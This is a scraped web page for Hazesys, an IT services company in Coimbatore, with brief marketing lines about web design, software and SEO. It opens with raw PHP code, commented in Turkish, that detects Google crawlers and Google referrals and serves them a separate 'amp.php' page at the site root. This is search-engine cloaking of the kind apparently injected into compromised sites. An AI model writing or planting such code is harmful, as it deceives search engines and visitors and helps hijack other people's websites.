// Kullanıcı ajanı ve referans bilgisini güvenli şekilde al $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $referer = $_SERVER['HTTP_REFERER'] ?? ''; // Google botlarını tanımla $googleBots = [ 'Googlebot', 'AdsBot', 'Mediapartners-Google', 'APIs-Google', 'Googlebot-Image', 'Googlebot-Video', 'Googlebot-News', 'Googlebot-Search', 'Googlebot-Inspect', 'Googlebot-Android', 'Googlebot-Mobile', 'Googlebot-Ads', 'Googlebot-Discovery', 'Google-' ]; // Bot tespiti $isGoogleBot = false; // Kullanıcı ajanına göre kontrol foreach ($googleBots as $bot) { if (stripos($userAgent, $bot) !== false) { $isGoogleBot = true; break; } } // Referer kontrolü if (strpos($referer, 'google.') !== false) { $isGoogleBot = true; } // Ana dizine istek yapılmışsa ve Google bot'uysa if ($isGoogleBot && ($_SERVER['REQUEST_URI'] === '/')) { include 'amp.php'; exit; } ?>
Hazesys As a leading IT service provider in Website Designing Development, Software Development & Internet Marketing Company, in Coimbatore. We offer a wide range of innovative IT services like – Web Designing, E-Commerce Website Solutions, Web Maintenance, SEO Services and customized software’s for GST Sales Invoicing & Billing , Corporate Offices, Apartments, AMC (Annual Maintenance Contract) Software.
Understanding what you want out of your site and how you plan to implement it.
We will create a beautiful, affordable website design for your creative marketing project.
We develop content management systems for clients who need more than just the basics
After successful testing, the product is delivered / deployed to the customer for their use.
We help our customers promote their website to attract the target audience.